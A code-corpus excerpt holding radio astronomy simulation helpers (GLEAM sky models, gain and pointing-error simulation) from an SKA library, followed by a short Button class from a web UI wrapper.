(GLEAM) survey. I: A low-frequency extragalactic catalogue. Hurley-Walker N., et al., Mon. Not. R. Astron. Soc., 464, 1146-1167 (2017), 2017MNRAS.464.1146H :param telescope: :param npixel: Number of pixels :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI")) :param cellsize: cellsize in radians :param frequency: :param channel_bandwidth: Channel width (Hz) :param phasecentre: phasecentre (SkyCoord) :param kind: Kind of interpolation (see scipy.interpolate.interp1d) Default: cubic :param applybeam: Apply the primary beam? :param flux_limit: Weakest component :param flux_max: Maximum strength component to be included in components :param flux_threshold: Split between components (brighter) and image (weaker) :param insert_method: Nearest | PSWF | Lanczos :return: :return: SkyModel """ if phasecentre is None: phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000') radius = npixel * cellsize sc = create_low_test_skycomponents_from_gleam(flux_limit=flux_limit, polarisation_frame=polarisation_frame, frequency=frequency, phasecentre=phasecentre, kind=kind, radius=radius) sc = filter_skycomponents_by_flux(sc, flux_max=flux_max) if polarisation_frame is None: polarisation_frame = PolarisationFrame("stokesI") npol = polarisation_frame.npol nchan = len(frequency) shape = [nchan, npol, npixel, npixel] w = WCS(naxis=4) # The negation in the longitude is needed by definition of RA, DEC w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]] w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0] w.wcs.ctype = ["RA---SIN", "DEC--SIN", 'STOKES', 'FREQ'] w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]] w.naxis = 4 w.wcs.radesys = 'ICRS' w.wcs.equinox = 2000.0 model = create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame) if applybeam: beam = create_pb(model, telescope=telescope, use_local=False) sc = apply_beam_to_skycomponent(sc, beam) weaksc = filter_skycomponents_by_flux(sc, flux_max=flux_threshold) brightsc = filter_skycomponents_by_flux(sc, flux_min=flux_threshold) model = insert_skycomponent(model, weaksc, insert_method=insert_method) log.info( 'create_low_test_skymodel_from_gleam: %d bright sources above flux threshold %.3f, %d weak sources below ' % (len(brightsc), flux_threshold, len(weaksc))) return SkyModel(components=brightsc, image=model, mask=None, gaintable=None) def create_low_test_skycomponents_from_gleam(flux_limit=0.1, polarisation_frame=PolarisationFrame("stokesI"), frequency=numpy.array([1e8]), kind='cubic', phasecentre=None, radius=1.0) \ -> List[Skycomponent]: """Create sky components from the GLEAM survey Stokes I is estimated from a cubic spline fit to the measured fluxes. The polarised flux is always zero. See http://www.mwatelescope.org/science/gleam-survey The catalog is available from Vizier. VIII/100 GaLactic and Extragalactic All-sky MWA survey (Hurley-Walker+, 2016) GaLactic and Extragalactic All-sky Murchison Wide Field Array (GLEAM) survey. I: A low-frequency extragalactic catalogue. Hurley-Walker N., et al., Mon. Not. R. Astron. Soc., 464, 1146-1167 (2017), 2017MNRAS.464.1146H :param flux_limit: Only write components brighter than this (Jy) :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI")) :param frequency: Frequencies at which the flux will be estimated :param kind: Kind of interpolation (see scipy.interpolate.interp1d) Default: linear :param phasecentre: Desired phase centre (SkyCoord) default None implies all sources :param radius: Radius of sources selected around phasecentre (default 1.0 rad) :return: List of Skycomponents """ fitsfile = arl_path("data/models/GLEAM_EGC.fits") rad2deg = 180.0 / numpy.pi decmin = phasecentre.dec.to('deg').value - rad2deg * radius / 2.0 decmax = phasecentre.dec.to('deg').value + rad2deg * radius / 2.0 hdulist = fits.open(fitsfile, lazy_load_hdus=False) recs = hdulist[1].data[0].array fluxes = recs['peak_flux_wide'] mask = fluxes > flux_limit filtered_recs = recs[mask] decs = filtered_recs['DEJ2000'] mask = decs > decmin filtered_recs = filtered_recs[mask] decs = filtered_recs['DEJ2000'] mask = decs < decmax filtered_recs = filtered_recs[mask] ras = filtered_recs['RAJ2000'] decs = filtered_recs['DEJ2000'] names = filtered_recs['Name'] if polarisation_frame is None: polarisation_frame = PolarisationFrame("stokesI") npol = polarisation_frame.npol nchan = len(frequency) # For every source, we read all measured fluxes and interpolate to the # required frequencies gleam_freqs = numpy.array([76, 84, 92, 99, 107, 115, 122, 130, 143, 151, 158, 166, 174, 181, 189, 197, 204, 212, 220, 227]) gleam_flux_freq = numpy.zeros([len(names), len(gleam_freqs)]) for i, f in enumerate(gleam_freqs): gleam_flux_freq[:, i] = filtered_recs['int_flux_%03d' % (f)][:] skycomps = [] directions = SkyCoord(ra=ras * u.deg, dec=decs * u.deg) if phasecentre is not None: separations = directions.separation(phasecentre).to('rad').value else: separations = numpy.zeros(len(names)) for isource, name in enumerate(names): direction = directions[isource] if separations[isource] < radius: fint = interpolate.interp1d(gleam_freqs * 1.0e6, gleam_flux_freq[isource, :], kind=kind) flux = numpy.zeros([nchan, npol]) flux[:, 0] = fint(frequency) if not numpy.isnan(flux).any(): skycomps.append(Skycomponent(direction=direction, flux=flux, frequency=frequency, name=name, shape='Point', polarisation_frame=polarisation_frame)) log.info('create_low_test_skycomponents_from_gleam: %d sources above flux limit %.3f' % (len(skycomps), flux_limit)) hdulist.close() return skycomps def replicate_image(im: Image, polarisation_frame=PolarisationFrame('stokesI'), frequency=numpy.array([1e8])) \ -> Image: """ Make a new canonical shape Image, extended along third and fourth axes by replication. The order of the data is [chan, pol, dec, ra] :param frequency: :param im: :param polarisation_frame: Polarisation_frame :return: Image """ if len(im.data.shape) == 2: fim = Image() newwcs = WCS(naxis=4) newwcs.wcs.crpix = [im.wcs.wcs.crpix[0] + 1.0, im.wcs.wcs.crpix[1] + 1.0, 1.0, 1.0] newwcs.wcs.cdelt = [im.wcs.wcs.cdelt[0], im.wcs.wcs.cdelt[1], 1.0, 1.0] newwcs.wcs.crval = [im.wcs.wcs.crval[0], im.wcs.wcs.crval[1], 1.0, frequency[0]] newwcs.wcs.ctype = [im.wcs.wcs.ctype[0], im.wcs.wcs.ctype[1], 'STOKES', 'FREQ'] nchan = len(frequency) npol = polarisation_frame.npol fim.polarisation_frame = polarisation_frame fim.wcs = newwcs fshape = [nchan, npol, im.data.shape[1], im.data.shape[0]] fim.data = numpy.zeros(fshape) log.info("replicate_image: replicating shape %s to %s" % (im.data.shape, fim.data.shape)) for i3 in range(nchan): fim.data[i3, 0, :, :] = im.data[:, :] return fim else: return im def create_blockvisibility_iterator(config: Configuration, times: numpy.array, frequency: numpy.array, channel_bandwidth, phasecentre: SkyCoord, weight: float = 1, polarisation_frame=PolarisationFrame('stokesI'), integration_time=1.0, number_integrations=1, predict=predict_2d, model=None, components=None, phase_error=0.0, amplitude_error=0.0, sleep=0.0, **kwargs): """ Create a sequence of Visibilities and optionally predicting and coalescing This is useful mainly for performing large simulations. Do something like:: vis_iter = create_blockvisibility_iterator(config, times, frequency, channel_bandwidth, phasecentre=phasecentre, weight=1.0, integration_time=30.0, number_integrations=3) for i, vis in enumerate(vis_iter): if i == 0: fullvis = vis else: fullvis = append_visibility(fullvis, vis) :param config: Configuration of antennas :param times: hour angles in radians :param frequency: frequencies (Hz] Shape [nchan] :param weight: weight of a single sample :param phasecentre: phasecentre of observation :param npol: Number of polarizations :param integration_time: Integration time ('auto' or value in s) :param number_integrations: Number of integrations to be created at each time. :param model: Model image to be inserted :param components: Components to be inserted :param sleep_time: Time to sleep between yields :return: Visibility """ for time in times: actualtimes = time + numpy.arange(0, number_integrations) * integration_time * numpy.pi / 43200.0 bvis = create_blockvisibility(config, actualtimes, frequency=frequency, phasecentre=phasecentre, weight=weight, polarisation_frame=polarisation_frame, integration_time=integration_time, channel_bandwidth=channel_bandwidth) if model is not None: vis = convert_blockvisibility_to_visibility(bvis) vis = predict(vis, model, **kwargs) bvis = convert_visibility_to_blockvisibility(vis) if components is not None: vis = predict_skycomponent_visibility(bvis, components) # Add phase errors if phase_error > 0.0 or amplitude_error > 0.0: gt = create_gaintable_from_blockvisibility(bvis) gt = simulate_gaintable(gt=gt, phase_error=phase_error, amplitude_error=amplitude_error) bvis = apply_gaintable(bvis, gt) import time time.sleep(sleep) yield bvis def simulate_gaintable(gt: GainTable, phase_error=0.1, amplitude_error=0.0, smooth_channels=1, leakage=0.0, **kwargs) -> GainTable: """ Simulate a gain table :type gt: GainTable :param phase_error: std of normal distribution, zero mean :param amplitude_error: std of log normal distribution :param leakage: std of cross hand leakage :param smooth_channels: Use bspline over smooth_channels :param kwargs: :return: Gaintable """ def moving_average(a, n=3): return numpy.convolve(a, numpy.ones((n,)) / n, mode='valid') log.debug("simulate_gaintable: Simulating amplitude error = %.4f, phase error = %.4f" % (amplitude_error, phase_error)) amps = 1.0 phases = 1.0 ntimes, nant, nchan, nrec, _ = gt.data['gain'].shape if phase_error > 0.0: phases = numpy.zeros(gt.data['gain'].shape) for time in range(ntimes): for ant in range(nant): phase = numpy.random.normal(0, phase_error, nchan + int(smooth_channels) - 1) if smooth_channels > 1: phase = moving_average(phase, smooth_channels) phases[time, ant, ...] = phase[..., numpy.newaxis, numpy.newaxis] if amplitude_error > 0.0: amps = numpy.ones(gt.data['gain'].shape, dtype='complex') for time in range(ntimes): for ant in range(nant): amp = numpy.random.lognormal(mean=0.0, sigma=amplitude_error, size=nchan + int(smooth_channels) - 1) if smooth_channels > 1: amp = moving_average(amp, smooth_channels) amp = amp / numpy.average(amp) amps[time, ant, ...] = amp[..., numpy.newaxis, numpy.newaxis] gt.data['gain'] = amps * numpy.exp(0 + 1j * phases) nrec = gt.data['gain'].shape[-1] if nrec > 1: if leakage > 0.0: leak = numpy.random.normal(0, leakage, gt.data['gain'][..., 0, 0].shape) + 1j * \ numpy.random.normal(0, leakage, gt.data['gain'][..., 0, 0].shape) gt.data['gain'][..., 0, 1] = gt.data['gain'][..., 0, 0] * leak leak = numpy.random.normal(0, leakage, gt.data['gain'][..., 1, 1].shape) + 1j * \ numpy.random.normal(0, leakage, gt.data['gain'][..., 1, 1].shape) gt.data['gain'][..., 1, 0] = gt.data['gain'][..., 1, 1] * leak else: gt.data['gain'][..., 0, 1] = 0.0 gt.data['gain'][..., 1, 0] = 0.0 return gt def simulate_pointingtable(pt: PointingTable, pointing_error, static_pointing_error=None, global_pointing_error=None, seed=None, **kwargs) -> PointingTable: """ Simulate a gain table :type pt: PointingTable :param pointing_error: std of normal distribution (radians) :param static_pointing_error: std of normal distribution (radians) :param global_pointing_error: 2-vector of global pointing error (rad) :param kwargs: :return: PointingTable """ if seed is not None: numpy.random.seed(seed) if static_pointing_error is None: static_pointing_error = [0.0, 0.0] r2s = 180.0 * 3600.0 / numpy.pi pt.data['pointing'] = numpy.zeros(pt.data['pointing'].shape) ntimes, nant, nchan, nrec, _ = pt.data['pointing'].shape if pointing_error > 0.0: log.debug("simulate_pointingtable: Simulating dynamic pointing error = %g (rad) %g (arcsec)" % (pointing_error, r2s * pointing_error)) pt.data['pointing'] += numpy.random.normal(0.0, pointing_error, pt.data['pointing'].shape) if (abs(static_pointing_error[0]) > 0.0) or (abs(static_pointing_error[1]) > 0.0): numpy.random.seed(18051955) log.debug("simulate_pointingtable: Simulating static pointing error = (%g, %g) (rad) (%g, %g)(arcsec)" % (static_pointing_error[0], static_pointing_error[1], r2s * static_pointing_error[0], r2s * static_pointing_error[1])) static_pe = numpy.zeros(pt.data['pointing'].shape[1:]) static_pe[...,0] = numpy.random.normal(0.0, static_pointing_error[0], static_pe[...,0].shape)[numpy.newaxis, ...] static_pe[...,1] = numpy.random.normal(0.0, static_pointing_error[1], static_pe[...,1].shape)[numpy.newaxis, ...] pt.data['pointing'] += static_pe if global_pointing_error is not None: if seed is not None: numpy.random.seed(seed) log.debug("simulate_pointingtable: Simulating global pointing error = [%g, %g] (rad) [%g,s %g] (arcsec)" % (global_pointing_error[0], global_pointing_error[1], r2s * global_pointing_error[0], r2s * global_pointing_error[1])) pt.data['pointing'][..., :] += global_pointing_error return pt def simulate_pointingtable_from_timeseries(pt, type='wind', time_series_type='precision', pointing_directory=None, reference_pointing=False, seed=None): """Create a pointing table with time series created from PSD. :param pt: Pointing table to be filled :param type: Type of pointing: 'tracking' or 'wind' :param pointing_file: Name of pointing file :param reference_pointing: Use reference pointing? :return: """ if seed is not None: numpy.random.seed(seed) if pointing_directory is None: pointing_directory = arl_path("data/models/%s" % time_series_type) pt.data['pointing'] = numpy.zeros(pt.data['pointing'].shape) ntimes, nant, nchan, nrec, _ = pt.data['pointing'].shape # Use az and el at the beginning of this pointingtable axis_values = pt.nominal[0,0,0,0,0] el = pt.nominal[0,0,0,0,1] el_deg = el * 180.0 / numpy.pi az_deg = axis_values * 180.0 / numpy.pi if el_deg < 30.0: el_deg = 15.0 elif el_deg < (90.0+45.0)/2.0: el_deg = 45.0 else: el_deg = 90.0 if abs(az_deg) < 45.0 / 2.0: az_deg = 0.0 elif abs(az_deg) < (45.0 + 90.0)/2.0: az_deg = 45.0 elif abs(az_deg) < (90.0 + 135.0)/2.0: az_deg = 90.0 elif abs(az_deg) < (135.0 + 180.0)/2.0: az_deg = 135.0 else: az_deg = 180.0 pointing_file = '%s/El%dAz%d.dat' % (pointing_directory, int(el_deg), int(az_deg)) log.debug("simulate_pointingtable_from_timeseries: Reading wind PSD from %s" % pointing_file) psd = numpy.loadtxt(pointing_file) # define some arrays freq = psd[:, 0] axesdict = { "az": psd[:, 1], "el": psd[:, 2], "pxel": psd[:, 3], "pel": psd[:, 4] } if type == 'tracking': axes = ["az", "el"] elif type == 'wind': axes = ["pxel", "pel"] else: raise ValueError("Pointing type %s not known" % type) freq_interval = 0.0001 for axis in axes: axis_values = axesdict[axis] if (axis == "az") or (axis == "el"): # determine index of maximum PSD value; add 50 for better fit axis_values_max_index = numpy.argwhere(axis_values == numpy.max(axis_values))[0][0] + 50 axis_values_max_index = min(axis_values_max_index, len(axis_values)) # max_freq = 2.0 / pt.interval[0] max_freq = 0.4 freq_max_index = numpy.argwhere(freq > max_freq)[0][0] else: break_freq = 0.01 # not max; just a break axis_values_max_index = numpy.argwhere(freq>break_freq)[0][0] # max_freq = 2.0 / pt.interval[0] max_freq = 0.1 freq_max_index = numpy.argwhere(freq > max_freq)[0][0] # construct regularly-spaced frequencies regular_freq = numpy.arange(freq[0], freq[freq_max_index], freq_interval) regular_axis_values_max_index = numpy.argwhere(numpy.abs(regular_freq-freq[axis_values_max_index])==numpy.min(numpy.abs(regular_freq-freq[axis_values_max_index])))[0][0] # print ('Frequency break: ', freq[az_max_index]) # print ('Max frequency: ', max_freq) # # print ('New frequency break: ', regular_freq[regular_az_max_index]) # print ('New max frequency: ', regular_freq[-1]) if axis_values_max_index>=freq_max_index: raise ValueError('Frequency break is higher than highest frequency; select a lower break') # use original frequency break and max frequency to fit function # fit polynomial to psd up to max value import warnings from numpy import RankWarning warnings.simplefilter('ignore', RankWarning) p_axis_values1 = numpy.polyfit(freq[:axis_values_max_index], numpy.log(axis_values[:axis_values_max_index]), 5) f_axis_values1 = numpy.poly1d(p_axis_values1) # fit polynomial to psd beyond max value p_axis_values2 = numpy.polyfit(freq[axis_values_max_index:freq_max_index], numpy.log(axis_values[axis_values_max_index:freq_max_index]), 5) f_axis_values2 = numpy.poly1d(p_axis_values2) # use new frequency break and max frequency to apply function (ensures equal spacing of frequency intervals) # resampled to construct regularly-spaced frequencies regular_axis_values1 = numpy.exp(f_axis_values1(regular_freq[:regular_axis_values_max_index])) regular_axis_values2 = numpy.exp(f_axis_values2(regular_freq[regular_axis_values_max_index:])) # join regular_axis_values = numpy.append(regular_axis_values1, regular_axis_values2) M0 = len(regular_axis_values) # check rms of resampled PSD # df = regular_freq[1:]-regular_freq[:-1] # psd2rms_pxel = numpy.sqrt(numpy.sum(regular_az[:-1]*df)) # print ('Calculate rms of resampled PSD: ', psd2rms_pxel) original_regular_freq = regular_freq original_regular_axis_values = regular_axis_values # get amplitudes from psd values if (regular_axis_values<0).any(): raise ValueError('Resampling returns negative power values; change fit range') amp_axis_values = numpy.sqrt(regular_axis_values*2*freq_interval) # need to scale PSD by 2* frequency interval before square rooting, then by number of modes in resampled PSD # Now we generate some random phases for ant in range(nant): regular_freq = original_regular_freq regular_axis_values = original_regular_axis_values phi_axis_values = numpy.random.rand(len(regular_axis_values)) * 2 * numpy.pi # create complex array z_axis_values = amp_axis_values * numpy.exp(1j * phi_axis_values) # polar # make symmetrical frequencies mirror_z_axis_values = numpy.copy(z_axis_values) # make complex conjugates mirror_z_axis_values.imag -= 2 * z_axis_values.imag # make negative frequencies mirror_regular_freq = -regular_freq # join z_axis_values = numpy.append(z_axis_values, mirror_z_axis_values[::-1]) regular_freq = numpy.append(regular_freq, mirror_regular_freq[::-1]) # add a 0 Fourier term z_axis_values = numpy.append(0 + 0 * 1j, z_axis_values) regular_freq = numpy.append(0, regular_freq) # perform inverse fft ts = numpy.fft.ifft(z_axis_values) # set up and check scalings N = len(ts) Dt = pt.interval[0] ts = numpy.real(ts) ts *= M0 # the result is scaled by number of points in the signal, so multiply - real part - by this # The output of the iFFT will be a random time series on the finite # (bounded, limited) time interval t = 0 to tmax = (N-1) X Dt, # # where Dt = 1 / (2 X Fmax) # scale to time interval times = numpy.arange(ntimes) * Dt # Convert from arcsec to radians ts *= numpy.pi / (180.0 * 3600.0) # We take reference pointing to mean that the pointing errors are zero at the beginning # of the set of integrations if reference_pointing: ts[:] -= ts[0] # pt.data['time'] = times[:ntimes] if axis == 'az': pt.data['pointing'][:, ant, :, :, 0] = ts[:ntimes, numpy.newaxis, numpy.newaxis, ...] elif axis == 'el': pt.data['pointing'][:, ant, :, :, 1] = ts[:ntimes, numpy.newaxis, numpy.newaxis, ...] elif axis == 'pxel': pt.data['pointing'][:, ant, :, :, 0] = ts[:ntimes, numpy.newaxis, numpy.newaxis, ...] elif axis == 'pel': pt.data['pointing'][:, ant, :, :, 1] = ts[:ntimes, numpy.newaxis, numpy.newaxis, ...] else: raise ValueError("Unknown axis %s" % axis) return pt def ingest_unittest_visibility(config, frequency, channel_bandwidth, times, vis_pol, phasecentre, block=False, zerow=False): if block: vt = create_blockvisibility(config, times, frequency, channel_bandwidth=channel_bandwidth, phasecentre=phasecentre, weight=1.0, polarisation_frame=vis_pol, zerow=zerow) else: vt = create_visibility(config, times, frequency, channel_bandwidth=channel_bandwidth, phasecentre=phasecentre, weight=1.0, polarisation_frame=vis_pol, zerow=zerow) vt.data['vis'][...] = 0.0 return vt def create_unittest_components(model, flux, applypb=False, telescope='LOW', npixel=None, scale=1.0, single=False, symmetric=False, angular_scale=1.0): # Fill the visibility with exactly computed point sources. if npixel == None: _, _, _, npixel = model.data.shape spacing_pixels = int(scale * npixel) // 4 log.info('Spacing in pixels = %s' % spacing_pixels) if not symmetric: centers = [(0.2*angular_scale, 1.1*angular_scale)] else: centers = list() if not single: centers.append([0.0, 0.0]) for x in numpy.linspace(-1.2*angular_scale, 1.2*angular_scale, 7): if abs(x) > 1e-15: centers.append([x, x]) centers.append([x, -x]) model_pol = model.polarisation_frame # Make the list of components rpix = model.wcs.wcs.crpix components = [] for center in centers: ix, iy = center # The phase center in 0-relative coordinates is n // 2 so we centre the grid of # components on ny // 2, nx // 2. The wcs must be defined consistently. p = int(round(rpix[0] + ix * spacing_pixels * numpy.sign(model.wcs.wcs.cdelt[0]))), \ int(round(rpix[1] + iy * spacing_pixels * numpy.sign(model.wcs.wcs.cdelt[1]))) sc = pixel_to_skycoord(p[0], p[1], model.wcs, origin=1) log.info("Component at (%f, %f) [0-rel] %s" % (p[0], p[1], str(sc))) # Channel images comp = create_skycomponent(direction=sc, flux=flux, frequency=model.frequency, polarisation_frame=model_pol) components.append(comp) if applypb: beam = create_pb(model, telescope=telescope, use_local=False) components = apply_beam_to_skycomponent(components, beam) return components def create_unittest_model(vis, model_pol, npixel=None, cellsize=None, nchan=1): advice = advise_wide_field(vis, guard_band_image=2.0, delA=0.02, facets=1, wprojection_planes=1, oversampling_synthesised_beam=4.0) if cellsize is None: cellsize = advice['cellsize'] if npixel is None: npixel = advice['npixels2'] model = create_image_from_visibility(vis, npixel=npixel, cellsize=cellsize, nchan=nchan, polarisation_frame=model_pol) return model def insert_unittest_errors(vt, seed=180555, calibration_context="TG", amp_errors=None, phase_errors=None): """Simulate gain errors and apply :param vt: :param seed: Random number seed, set to big integer repeat values from run to run :param phase_errors: e.g. {'T': 1.0, 'G': 0.1, 'B': 0.01} :param amp_errors: e.g. {'T': 0.0, 'G': 0.01, 'B': 0.01} :return: """ controls = create_calibration_controls() if amp_errors is None: amp_errors = {'T': 0.0, 'G': 0.01, 'B': 0.01} if phase_errors is None: phase_errors = {'T': 1.0, 'G': 0.1, 'B': 0.01} for c in calibration_context: gaintable = create_gaintable_from_blockvisibility(vt, timeslice=controls[c]['timeslice']) gaintable = simulate_gaintable(gaintable, phase_error=phase_errors[c], amplitude_error=amp_errors[c], timeslice=controls[c]['timeslice'], phase_only=controls[c]['phase_only'], crosspol=controls[c]['shape'] == 'matrix') vt = apply_gaintable(vt, gaintable, timeslice=controls[c]['timeslice'], inverse=True) return vt
SKA-ScienceDataProcessor/algorithm-reference-library
processing_components/simulation/testing_support.py
Python
apache-2.0
47,842
0.007504
from aisikl.events import action_event from .actionablecontrol import ActionableControl class Button(ActionableControl): def __init__(self, dialog, id, type, parent_id, properties, element): super().__init__(dialog, id, type, parent_id, properties, element) self.image = properties.get('img') self.confirm_question = element.get('confirmquestion') self.access_key = element.get('accesskey') if isinstance(self.access_key, list): self.access_key = ' '.join(self.access_key) # BeautifulSoup :( def _ais_setAccessKey(self, value): self.access_key = value def _ais_setImage(self, value): self.image = value def _ais_setConfirmQuestion(self, value): self.confirm_question = value def click(self): self.log('action', 'Clicking {}'.format(self.id)) if self.try_execute_action(): return ev = action_event(self, None, self.id) # TODO: We should technically ask confirm_question before firing # (if ev.listening is True), but we probably don't care. self.dialog.app.send_events(ev) # Note that showPopupMenus() is unsupported. Use menu items directly.
fmfi-svt/votr
aisikl/components/button.py
Python
apache-2.0
1,203
0.002494